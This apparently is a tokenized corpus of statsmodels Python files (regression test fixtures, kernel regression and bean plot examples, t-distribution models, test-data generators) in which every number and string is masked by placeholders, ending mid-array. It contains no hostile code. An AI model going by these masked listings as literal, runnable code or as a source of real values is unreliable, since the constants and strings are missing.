<NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:3> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . split ( ) <EOL> results_logit_constraint2 = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) </s>
<s> </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from statsmodels . nonparametric . api import KernelReg <EOL> import statsmodels . sandbox . nonparametric . dgp_examples as dgp <EOL> seed = np . random . randint ( <NUM_LIT> ) <EOL> seed = <NUM_LIT> <EOL> print ( seed ) <EOL> np . random . seed ( seed ) <EOL> funcs = [ dgp . UnivariateFanGijbels1 ( ) , <EOL> dgp . UnivariateFanGijbels2 ( ) , <EOL> dgp . UnivariateFanGijbels1EU ( ) , <EOL> dgp . UnivariateFunc1 ( ) <EOL> ] <EOL> res = [ ] <EOL> fig = plt . figure ( ) <EOL> for i , func in enumerate ( funcs ) : <EOL> f = func <EOL> model = KernelReg ( endog = [ f . y ] , exog = [ f . x ] , reg_type = '<STR_LIT>' , <EOL> var_type = '<STR_LIT:c>' , bw = '<STR_LIT>' ) <EOL> mean , mfx = model . fit ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , i + <NUM_LIT:1> ) <EOL> f . plot ( ax = ax ) <EOL> ax . plot ( f . x , mean , color = '<STR_LIT:r>' , lw = <NUM_LIT:2> , label = '<STR_LIT>' ) <EOL> ax . legend ( loc = '<STR_LIT>' ) <EOL> res . append ( ( model , mean , mfx ) ) <EOL> fig . suptitle ( '<STR_LIT>' ) <EOL> fig . show ( ) </s>
<s> from __future__ import print_function <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import statsmodels . api as sm <EOL> plt . rcParams [ '<STR_LIT>' ] = <NUM_LIT> <EOL> data = sm . datasets . anes96 . load_pandas ( ) <EOL> party_ID = np . arange ( <NUM_LIT:7> ) <EOL> labels = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> age = [ data . exog [ '<STR_LIT>' ] [ data . endog == id ] for id in party_ID ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> sm . graphics . violinplot ( age , ax = ax , labels = labels , <EOL> plot_opts = { '<STR_LIT>' : <NUM_LIT:5> , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:30> } ) <EOL> ax . set_xlabel ( "<STR_LIT>" ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> fig2 = plt . figure ( ) <EOL> ax = fig2 . add_subplot ( <NUM_LIT> ) <EOL> sm . graphics . beanplot ( age , ax = ax , labels = labels , <EOL> plot_opts = { '<STR_LIT>' : <NUM_LIT:5> , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:30> } ) <EOL> ax . set_xlabel ( "<STR_LIT>" ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> fig3 = plt . figure ( ) <EOL> ax = fig3 . add_subplot ( <NUM_LIT> ) <EOL> plot_opts = { '<STR_LIT>' : <NUM_LIT:5> , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:30> , '<STR_LIT>' : ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> '<STR_LIT>' : '<STR_LIT:.>' , '<STR_LIT>' : <NUM_LIT:3> , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> sm . graphics . beanplot ( age , ax = ax , labels = labels , jitter = True , <EOL> plot_opts = plot_opts ) <EOL> ax . set_xlabel ( "<STR_LIT>" ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> ix = data . exog [ '<STR_LIT>' ] < <NUM_LIT:16> <EOL> age = data . exog [ '<STR_LIT>' ] [ ix ] <EOL> endog = data . endog [ ix ] <EOL> age_lower_income = [ age [ endog == id ] for id in party_ID ] <EOL> ix = data . exog [ '<STR_LIT>' ] >= <NUM_LIT:20> <EOL> age = data . exog [ '<STR_LIT>' ] [ ix ] <EOL> endog = data . endog [ ix ] <EOL> age_higher_income = [ age [ endog == id ] for id in party_ID ] <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> plot_opts [ '<STR_LIT>' ] = ( <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0.5> ) <EOL> plot_opts [ '<STR_LIT>' ] = False <EOL> plot_opts [ '<STR_LIT>' ] = False <EOL> plot_opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> plot_opts [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> sm . graphics . beanplot ( age_lower_income , ax = ax , labels = labels , side = '<STR_LIT:left>' , <EOL> jitter = True , plot_opts = plot_opts ) <EOL> plot_opts [ '<STR_LIT>' ] = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> plot_opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> plot_opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> sm . graphics . beanplot ( age_higher_income , ax = ax , labels = labels , side = '<STR_LIT:right>' , <EOL> jitter = True , plot_opts = plot_opts ) <EOL> ax . set_xlabel ( "<STR_LIT>" ) <EOL> ax . set_ylabel ( "<STR_LIT>" ) <EOL> ax . set_title ( "<STR_LIT>" ) <EOL> plt . show ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import print_function <EOL> import numpy as np <EOL> import statsmodels . api as sm <EOL> import matplotlib . pyplot as plt <EOL> from statsmodels . sandbox . regression . predstd import wls_prediction_std <EOL> np . random . seed ( <NUM_LIT> ) <EOL> nsample = <NUM_LIT:50> <EOL> x1 = np . linspace ( <NUM_LIT:0> , <NUM_LIT:20> , nsample ) <EOL> sig = <NUM_LIT:1.> <EOL> xg = np . zeros ( nsample , int ) <EOL> xg [ <NUM_LIT:20> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> xg [ <NUM_LIT> : ] = <NUM_LIT:2> <EOL> dummy = ( xg [ : , None ] == np . unique ( xg ) ) . astype ( float ) <EOL> X = np . c_ [ x1 , dummy [ : , <NUM_LIT:1> : ] , np . ones ( nsample ) ] <EOL> beta = [ <NUM_LIT:1.> , <NUM_LIT:3> , - <NUM_LIT:3> , <NUM_LIT:10> ] <EOL> y_true = np . dot ( X , beta ) <EOL> y = y_true + sig * np . random . normal ( size = nsample ) <EOL> res2 = sm . OLS ( y , X ) . fit ( ) <EOL> print ( res2 . params ) <EOL> print ( res2 . bse ) <EOL> prstd , iv_l , iv_u = wls_prediction_std ( res2 ) <EOL> plt . figure ( ) <EOL> plt . plot ( x1 , y , '<STR_LIT:o>' , x1 , y_true , '<STR_LIT>' ) <EOL> plt . plot ( x1 , res2 . fittedvalues , '<STR_LIT>' ) <EOL> plt . plot ( x1 , iv_u , '<STR_LIT>' ) <EOL> plt . plot ( x1 , iv_l , '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . show ( ) <EOL> R = [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ] <EOL> print ( "<STR_LIT>" ) <EOL> print ( res2 . f_test ( R ) ) </s>
<s> """<STR_LIT>""" <EOL> from statsmodels . compat . python import zip <EOL> import numpy as np <EOL> from scipy . stats import gaussian_kde <EOL> from . import utils <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def violinplot ( data , ax = None , labels = None , positions = None , side = '<STR_LIT>' , <EOL> show_boxplot = True , plot_opts = { } ) : <EOL> """<STR_LIT>""" <EOL> fig , ax = utils . create_mpl_ax ( ax ) <EOL> if positions is None : <EOL> positions = np . arange ( len ( data ) ) + <NUM_LIT:1> <EOL> pos_span = np . max ( positions ) - np . min ( positions ) <EOL> width = np . min ( [ <NUM_LIT> * np . max ( [ pos_span , <NUM_LIT:1.> ] ) , <EOL> plot_opts . get ( '<STR_LIT>' , <NUM_LIT> ) / <NUM_LIT> ] ) <EOL> for pos_data , pos in zip ( data , positions ) : <EOL> xvals , violin = _single_violin ( ax , pos , pos_data , width , side , <EOL> plot_opts ) <EOL> if show_boxplot : <EOL> ax . boxplot ( data , notch = <NUM_LIT:1> , positions = positions , vert = <NUM_LIT:1> ) <EOL> _set_ticks_labels ( ax , data , labels , positions , plot_opts ) <EOL> return fig <EOL> def _single_violin ( ax , pos , pos_data , width , side , plot_opts ) : <EOL> """<STR_LIT>""" <EOL> def _violin_range ( pos_data , plot_opts ) : <EOL> """<STR_LIT>""" <EOL> cutoff = plot_opts . get ( '<STR_LIT>' , False ) <EOL> cutoff_type = plot_opts . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> cutoff_val = plot_opts . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> s = <NUM_LIT:0.0> <EOL> if not cutoff : <EOL> if cutoff_type == '<STR_LIT>' : <EOL> s = cutoff_val * np . std ( pos_data ) <EOL> else : <EOL> s = cutoff_val <EOL> x_lower = kde . dataset . min ( ) - s <EOL> x_upper = kde . dataset . max ( ) + s <EOL> return np . linspace ( x_lower , x_upper , <NUM_LIT:100> ) <EOL> pos_data = np . asarray ( pos_data ) <EOL> kde = gaussian_kde ( pos_data ) <EOL> xvals = _violin_range ( pos_data , plot_opts ) <EOL> violin = kde . evaluate ( xvals ) <EOL> violin = width * violin / violin . max ( ) <EOL> if side == '<STR_LIT>' : <EOL> envelope_l , envelope_r = ( - violin + pos , violin + pos ) <EOL> elif side == '<STR_LIT:right>' : <EOL> envelope_l , envelope_r = ( pos , violin + pos ) <EOL> elif side == '<STR_LIT:left>' : <EOL> envelope_l , envelope_r = ( - violin + pos , pos ) <EOL> else : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> ax . fill_betweenx ( xvals , envelope_l , envelope_r , <EOL> facecolor = plot_opts . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> edgecolor = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:k>' ) , <EOL> lw = plot_opts . get ( '<STR_LIT>' , <NUM_LIT:1> ) , <EOL> alpha = plot_opts . get ( '<STR_LIT>' , <NUM_LIT:0.5> ) ) <EOL> return xvals , violin <EOL> def _set_ticks_labels ( ax , data , labels , positions , plot_opts ) : <EOL> """<STR_LIT>""" <EOL> ax . set_xlim ( [ np . min ( positions ) - <NUM_LIT:0.5> , np . max ( positions ) + <NUM_LIT:0.5> ] ) <EOL> ax . set_xticks ( positions ) <EOL> label_fontsize = plot_opts . get ( '<STR_LIT>' ) <EOL> label_rotation = plot_opts . get ( '<STR_LIT>' ) <EOL> if label_fontsize or label_rotation : <EOL> from matplotlib . artist import setp <EOL> if labels is not None : <EOL> if not len ( labels ) == len ( data ) : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> xticknames = ax . set_xticklabels ( labels ) <EOL> if label_fontsize : <EOL> setp ( xticknames , fontsize = label_fontsize ) <EOL> if label_rotation : <EOL> setp ( xticknames , rotation = label_rotation ) <EOL> return <EOL> def beanplot ( data , ax = None , labels = None , positions = None , side = '<STR_LIT>' , <EOL> jitter = False , plot_opts = { } ) : <EOL> """<STR_LIT>""" <EOL> fig , ax = utils . create_mpl_ax ( ax ) <EOL> if positions is None : <EOL> positions = np . arange ( len ( data ) ) + <NUM_LIT:1> <EOL> pos_span = np . max ( positions ) - np . min ( positions ) <EOL> violin_width = np . min ( [ <NUM_LIT> * np . max ( [ pos_span , <NUM_LIT:1.> ] ) , <EOL> plot_opts . get ( '<STR_LIT>' , <NUM_LIT> ) / <NUM_LIT> ] ) <EOL> bean_width = np . min ( [ <NUM_LIT> * np . max ( [ pos_span , <NUM_LIT:1.> ] ) , <EOL> plot_opts . get ( '<STR_LIT>' , <NUM_LIT:0.5> ) / <NUM_LIT> ] ) <EOL> bean_mean_width = np . min ( [ <NUM_LIT> * np . max ( [ pos_span , <NUM_LIT:1.> ] ) , <EOL> plot_opts . get ( '<STR_LIT>' , <NUM_LIT:0.5> ) / <NUM_LIT> ] ) <EOL> legend_txt = plot_opts . get ( '<STR_LIT>' , None ) <EOL> for pos_data , pos in zip ( data , positions ) : <EOL> xvals , violin = _single_violin ( ax , pos , pos_data , violin_width , side , plot_opts ) <EOL> if jitter : <EOL> jitter_coord = pos + _jitter_envelope ( pos_data , xvals , violin , side ) <EOL> ax . plot ( jitter_coord , pos_data , ls = '<STR_LIT>' , <EOL> marker = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:o>' ) , <EOL> ms = plot_opts . get ( '<STR_LIT>' , <NUM_LIT:4> ) , <EOL> mec = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:k>' ) , <EOL> mew = <NUM_LIT:1> , mfc = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:none>' ) , <EOL> label = legend_txt ) <EOL> else : <EOL> ax . hlines ( pos_data , pos - bean_width , pos + bean_width , <EOL> lw = plot_opts . get ( '<STR_LIT>' , <NUM_LIT:0.5> ) , <EOL> color = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:k>' ) , <EOL> label = legend_txt ) <EOL> if legend_txt is not None : <EOL> _show_legend ( ax ) <EOL> legend_txt = None <EOL> if plot_opts . get ( '<STR_LIT>' , True ) : <EOL> ax . hlines ( np . mean ( pos_data ) , pos - bean_mean_width , pos + bean_mean_width , <EOL> lw = plot_opts . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> color = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:b>' ) ) <EOL> if plot_opts . get ( '<STR_LIT>' , True ) : <EOL> ax . plot ( pos , np . median ( pos_data ) , <EOL> marker = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:+>' ) , <EOL> color = plot_opts . get ( '<STR_LIT>' , '<STR_LIT:r>' ) ) <EOL> _set_ticks_labels ( ax , data , labels , positions , plot_opts ) <EOL> return fig <EOL> def _jitter_envelope ( pos_data , xvals , violin , side ) : <EOL> """<STR_LIT>""" <EOL> if side == '<STR_LIT>' : <EOL> low , high = ( - <NUM_LIT:1.> , <NUM_LIT:1.> ) <EOL> elif side == '<STR_LIT:right>' : <EOL> low , high = ( <NUM_LIT:0> , <NUM_LIT:1.> ) <EOL> elif side == '<STR_LIT:left>' : <EOL> low , high = ( - <NUM_LIT:1.> , <NUM_LIT:0> ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % side ) <EOL> jitter_envelope = np . interp ( pos_data , xvals , violin ) <EOL> jitter_coord = jitter_envelope * np . random . uniform ( low = low , high = high , <EOL> size = pos_data . size ) <EOL> return jitter_coord <EOL> def _show_legend ( ax ) : <EOL> """<STR_LIT>""" <EOL> leg = ax . legend ( loc = <NUM_LIT:1> , shadow = True , fancybox = True , labelspacing = <NUM_LIT> , <EOL> borderpad = <NUM_LIT> ) <EOL> ltext = leg . get_texts ( ) <EOL> llines = leg . get_lines ( ) <EOL> frame = leg . get_frame ( ) <EOL> from matplotlib . artist import setp <EOL> setp ( ltext , fontsize = '<STR_LIT>' ) <EOL> setp ( llines , linewidth = <NUM_LIT:1> ) </s>
<s> from . foreign import StataReader , genfromdta , savetxt <EOL> from . table import SimpleTable , csv2st <EOL> from . smpickle import save_pickle , load_pickle <EOL> from statsmodels import NoseWrapper as Tester <EOL> test = Tester ( ) . test </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from scipy import special <EOL> np_log = np . log <EOL> np_pi = np . pi <EOL> sps_gamln = special . gammaln <EOL> from statsmodels . base . model import GenericLikelihoodModel <EOL> class TLinearModel ( GenericLikelihoodModel ) : <EOL> '''<STR_LIT>''' <EOL> def initialize ( self ) : <EOL> self . k_vars = self . exog . shape [ <NUM_LIT:1> ] <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . fix_df = False <EOL> if self . fix_df is False : <EOL> self . fixed_params = None <EOL> self . fixed_paramsmask = None <EOL> self . k_params = self . exog . shape [ <NUM_LIT:1> ] + <NUM_LIT:2> <EOL> extra_params_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> self . k_params = self . exog . shape [ <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> fixdf = np . nan * np . zeros ( self . exog . shape [ <NUM_LIT:1> ] + <NUM_LIT:2> ) <EOL> fixdf [ - <NUM_LIT:2> ] = self . fix_df <EOL> self . fixed_params = fixdf <EOL> self . fixed_paramsmask = np . isnan ( fixdf ) <EOL> extra_params_names = [ '<STR_LIT>' ] <EOL> self . _set_extra_params_names ( extra_params_names ) <EOL> self . _set_start_params ( ) <EOL> super ( TLinearModel , self ) . initialize ( ) <EOL> def _set_start_params ( self , start_params = None , use_kurtosis = False ) : <EOL> if start_params is not None : <EOL> self . start_params = start_params <EOL> else : <EOL> from statsmodels . regression . linear_model import OLS <EOL> res_ols = OLS ( self . endog , self . exog ) . fit ( ) <EOL> start_params = <NUM_LIT:0.1> * np . ones ( self . k_params ) <EOL> start_params [ : self . k_vars ] = res_ols . params <EOL> if self . fix_df is False : <EOL> if use_kurtosis : <EOL> kurt = stats . kurtosis ( res_ols . resid ) <EOL> df = <NUM_LIT> / kurt + <NUM_LIT:4> <EOL> else : <EOL> df = <NUM_LIT:5> <EOL> start_params [ - <NUM_LIT:2> ] = df <EOL> start_params [ - <NUM_LIT:1> ] = np . sqrt ( res_ols . scale ) <EOL> self . start_params = start_params <EOL> def loglike ( self , params ) : <EOL> return - self . nloglikeobs ( params ) . sum ( <NUM_LIT:0> ) <EOL> def nloglikeobs ( self , params ) : <EOL> """<STR_LIT>""" <EOL> if not self . fixed_params is None : <EOL> params = self . expandparams ( params ) <EOL> beta = params [ : - <NUM_LIT:2> ] <EOL> df = params [ - <NUM_LIT:2> ] <EOL> scale = np . abs ( params [ - <NUM_LIT:1> ] ) <EOL> loc = np . dot ( self . exog , beta ) <EOL> endog = self . endog <EOL> x = ( endog - loc ) / scale <EOL> lPx = sps_gamln ( ( df + <NUM_LIT:1> ) / <NUM_LIT:2> ) - sps_gamln ( df / <NUM_LIT> ) <EOL> lPx -= <NUM_LIT:0.5> * np_log ( df * np_pi ) + ( df + <NUM_LIT:1> ) / <NUM_LIT> * np_log ( <NUM_LIT:1> + ( x ** <NUM_LIT:2> ) / df ) <EOL> lPx -= np_log ( scale ) <EOL> return - lPx <EOL> def predict ( self , params , exog = None ) : <EOL> if exog is None : <EOL> exog = self . exog <EOL> return np . dot ( exog , params [ : self . exog . shape [ <NUM_LIT:1> ] ] ) <EOL> from scipy import stats <EOL> from statsmodels . tsa . arma_mle import Arma <EOL> class TArma ( Arma ) : <EOL> '''<STR_LIT>''' <EOL> def loglike ( self , params ) : <EOL> return - self . nloglikeobs ( params ) . sum ( <NUM_LIT:0> ) <EOL> def nloglikeobs ( self , params ) : <EOL> """<STR_LIT>""" <EOL> errorsest = self . geterrors ( params [ : - <NUM_LIT:2> ] ) <EOL> df = params [ - <NUM_LIT:2> ] <EOL> scale = np . abs ( params [ - <NUM_LIT:1> ] ) <EOL> llike = - stats . t . _logpdf ( errorsest / scale , df ) + np_log ( scale ) <EOL> return llike <EOL> def fit_mle ( self , order , start_params = None , method = '<STR_LIT>' , maxiter = <NUM_LIT> , <EOL> tol = <NUM_LIT> , ** kwds ) : <EOL> nar , nma = order <EOL> if start_params is not None : <EOL> if len ( start_params ) != nar + nma + <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> else : <EOL> start_params = np . concatenate ( ( <NUM_LIT> * np . ones ( nar + nma ) , [ <NUM_LIT:5> , <NUM_LIT:1> ] ) ) <EOL> res = super ( TArma , self ) . fit_mle ( order = order , <EOL> start_params = start_params , <EOL> method = method , maxiter = maxiter , <EOL> tol = tol , ** kwds ) <EOL> return res </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import os <EOL> np . random . seed ( <NUM_LIT> ) <EOL> ngroup = <NUM_LIT:100> <EOL> n_min = <NUM_LIT:1> <EOL> n_max = <NUM_LIT:5> <EOL> dsix = <NUM_LIT:0> <EOL> for pr in <NUM_LIT:1> , <NUM_LIT:2> : <EOL> re_sd = np . linspace ( - <NUM_LIT:0.5> , <NUM_LIT> , pr ) <EOL> for pf in <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> : <EOL> for sig in <NUM_LIT:0.5> , <NUM_LIT:2> : <EOL> params = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:1> , pf ) <EOL> endog = [ ] <EOL> exog_fe = [ ] <EOL> exog_re = [ ] <EOL> groups = [ ] <EOL> for i in range ( ngroup ) : <EOL> n = np . random . randint ( n_min , n_max , <NUM_LIT:1> ) <EOL> x_fe = np . random . normal ( size = ( n , pf ) ) <EOL> x_re = np . zeros ( ( n , pr ) ) <EOL> u = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:1> , n ) <EOL> for j in range ( pr ) : <EOL> x_re [ : , j ] = u ** j <EOL> re = np . random . normal ( size = pr ) * re_sd <EOL> expval = np . dot ( x_fe , params ) + np . dot ( x_re , re ) <EOL> endog . append ( expval + sig * np . random . normal ( size = n ) ) <EOL> exog_fe . append ( x_fe ) <EOL> exog_re . append ( x_re ) <EOL> groups . append ( i * np . ones ( n ) ) <EOL> endog = np . concatenate ( endog ) <EOL> exog_fe = np . concatenate ( exog_fe , axis = <NUM_LIT:0> ) <EOL> exog_re = np . concatenate ( exog_re , axis = <NUM_LIT:0> ) <EOL> groups = np . concatenate ( groups , axis = <NUM_LIT:0> ) <EOL> data = np . concatenate ( ( groups [ : , None ] , endog [ : , None ] , <EOL> exog_fe , exog_re ) , axis = <NUM_LIT:1> ) <EOL> header = [ "<STR_LIT>" , ] + [ "<STR_LIT>" % k for k in range ( pf ) ] + [ "<STR_LIT>" % k for k in range ( pr ) ] <EOL> header = "<STR_LIT:U+002C>" . join ( header ) <EOL> cur_dir = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> fname = os . path . join ( cur_dir , "<STR_LIT>" , <EOL> "<STR_LIT>" % dsix ) <EOL> np . savetxt ( fname , data , fmt = "<STR_LIT>" , header = header , <EOL> delimiter = "<STR_LIT:U+002C>" , comments = "<STR_LIT>" ) <EOL> dsix += <NUM_LIT:1> </s>
<s> '''<STR_LIT>''' <EOL> '''<STR_LIT>''' <EOL> def acovf_fft ( x , demean = True ) : <EOL> '''<STR_LIT>''' <EOL> from scipy import signal <EOL> x = np . asarray ( x ) <EOL> if demean : <EOL> x = x - x . mean ( ) <EOL> signal . fftconvolve ( x , x [ : : - <NUM_LIT:1> ] ) [ len ( x ) - <NUM_LIT:1> : len ( x ) + <NUM_LIT:10> ] / x . shape [ <NUM_LIT:0> ] </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from numpy . testing import assert_ , assert_almost_equal <EOL> from statsmodels . sandbox . distributions . extras import ( skewnorm , <EOL> skewnorm2 , ACSkewT_gen ) <EOL> def test_skewnorm ( ) : <EOL> pdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> pdf_sn = skewnorm . pdf ( [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( pdf_sn , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) ) <EOL> pdf_sn2 = skewnorm2 . pdf ( [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( pdf_sn2 , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) ) <EOL> cdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> cdf_sn = skewnorm . cdf ( [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:10> ) <EOL> maxabs = np . max ( np . abs ( cdf_sn - cdf_r ) ) <EOL> maxrel = np . max ( np . abs ( cdf_sn - cdf_r ) / ( cdf_r + <NUM_LIT> ) ) <EOL> msg = "<STR_LIT>" % ( maxabs , maxrel , cdf_sn , <EOL> cdf_r ) <EOL> assert_almost_equal ( cdf_sn , cdf_r , decimal = <NUM_LIT:10> ) <EOL> cdf_sn2 = skewnorm2 . cdf ( [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , <NUM_LIT:10> ) <EOL> maxabs = np . max ( np . abs ( cdf_sn2 - cdf_r ) ) <EOL> maxrel = np . max ( np . abs ( cdf_sn2 - cdf_r ) / ( cdf_r + <NUM_LIT> ) ) <EOL> msg = "<STR_LIT>" % ( maxabs , maxrel ) <EOL> assert_almost_equal ( cdf_sn2 , cdf_r , decimal = <NUM_LIT:10> , err_msg = msg ) <EOL> def test_skewt ( ) : <EOL> skewt = ACSkewT_gen ( ) <EOL> x = [ - <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> pdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> pdf_st = skewt . pdf ( x , <NUM_LIT> , <NUM_LIT:10> ) <EOL> pass <EOL> np . allclose ( pdf_st , pdf_r , rtol = <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> np . allclose ( pdf_st , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) <EOL> cdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> cdf_st = skewt . cdf ( x , <NUM_LIT> , <NUM_LIT:10> ) <EOL> np . allclose ( cdf_st , cdf_r , rtol = <NUM_LIT:0> , atol = <NUM_LIT> ) <EOL> np . allclose ( cdf_st , cdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) <EOL> pdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> pdf_st = skewt . pdf ( x , <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( pdf_st , pdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT> ) ) <EOL> cdf_r = np . array ( [ <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> cdf_st = skewt . cdf ( x , <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> assert_ ( np . allclose ( cdf_st , cdf_r , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) ) <EOL> pdf_r = np . array ( [ 